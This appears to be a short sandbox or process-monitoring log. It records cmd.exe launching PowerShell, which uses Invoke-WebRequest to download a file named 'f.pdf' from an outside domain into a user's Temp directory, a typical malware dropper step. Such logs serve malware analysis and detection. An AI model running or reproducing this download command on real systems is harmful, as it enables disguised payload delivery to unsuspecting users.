cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\f.pdf'"
2092powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\test22\AppData\Local\Temp\f.pdf'"
2176